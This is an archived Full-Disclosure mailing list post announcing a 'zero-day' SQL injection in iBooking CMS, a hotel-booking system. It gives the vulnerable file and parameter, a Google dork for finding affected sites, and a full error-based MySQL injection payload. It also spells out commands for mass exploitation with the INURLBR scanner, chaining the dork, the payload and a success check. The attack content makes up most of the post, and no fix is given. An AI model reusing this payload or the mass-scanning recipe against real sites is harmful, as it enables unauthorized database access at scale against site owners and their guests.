| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 16 Sep 2015 01:53:08 -0300
From: INURL Brasil <inurlbr@...il.com>
To: Packet Storm <packet@...ketstormsecurity.com>,
Exploit Arab <exploit4arab@...il.com>,
submissions@...ketstormsecurity.com, fulldisclosure@...lists.org
Subject: [FD] (0day) IBOOKING CMS - SQL INJECTION
*# VENTOR: * www.ibooking.com.br
*# Vulnerable versions:* ALL
*# File: * filtro_faixa_etaria.php
*# Parameter: * idPousada(GET)
*# DORK: * intext:"Desenvolvido por ibooking"
*# Reported:* 15/10/2015
#
---------------------------------------------------------------------------------
# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# EMAIL: inurlbr@...il.com
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
#
---------------------------------------------------------------------------------
*# Description*
The vulnerable request is made through a javascript function found within
/motor-de-reservas
# Javascript code responsible for vulnerable request
$.ajax({
type: "GET",
url: "filtro_faixa_etaria.php",
data: "qtde_quartos=1&idPousada=61",
success: function(xml){
$("#filtro_faixa_etaria").html(xml);
}
});
*# URL Vulnerable:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61
*# POC:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(SQL_INJECTION)
*# Example:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)
*# Return print:*
http://1.bp.blogspot.com/-vttfzGtov5g/VfiRJhIDwVI/AAAAAAAABVY/tPbBSiHft7c/s1600/Captura%2Bde%2Btela%2Bde%2B2015-09-15%2B18%253A42%253A51.png
*# Mass exploration using scanner INURLBR*
# Download: https://github.com/googleinurl/SCANNER-INURLBR
*# COMMAND*
*# SETTING DORK DE PESQUISA*
--dork 'YOU_DORK'
*# USE* --dork 'intext:"Desenvolvido por ibooking"'
*# SETTING OUTPUT FILE:*
*# USE* -s 'ibooking.txt'
*# SETTING STRING EXPLOIT GET:*
--exploit-get 'EXPLOIT_GET'
*# USE* --exploit-get
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'
*# SETTING TYPE OF VALIDATION: *
*# USE* -t 3
The third type combine both first and second types: Then, of course, it
also establishes connection with the exploit through the get method.
The string get set in parameter --exploit-get It is injected directly in
the url:
Exemplo: --exploit-get '/index.php?id=1&file=conect.php'INJEÇÃO URL:
http://www.target.br/index.php?id=1&file=conect.php
*# SETTING STRING OF VALIDATION:*
Specify the string to be used as validation script:
Exemplo: -a {string}
Usando: -a '<title>hello world</title>'
If the specific value is found in the target, it is considered vulnerable.
- USE: -a 'INURLBR_VULN'
The INURLBR_VULN value is passed in hexadecimal format in the exploit-get
string
*# COMMAND FULL:*
php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s
'ibooking.txt' --exploit-get
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'
-t 3 -a 'INURLBR_VULN'
*# MORE INFORMATION:*
http://blog.inurl.com.br/2015/09/0day-ibooking-cms-injecao-de-sql-e.html
+--------------------------------------------------------------------------------------+
| | | G R 3 3 T S
| | |
+--------------------------------------------------------------------------------------+
* r00t-3xp10t, Jh00n, chk_, Unknownantisec, sl4y3r 0wn3r, hc0d3r,
arplhmd, 0x4h4x
* Clandestine, KoubackTr, SnakeTomahawk, SkyRedFild, Lorenzo Faletra,
Eclipse, shaxer
* dd3str0y3r, Johnny Deep, Lenon Leite, pSico_b0y, Bakunim_Malvadão,
IceKiller, c00z
* Oystex, rH, Warflop, se4b3ar , Pablo Verlly Moreira
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists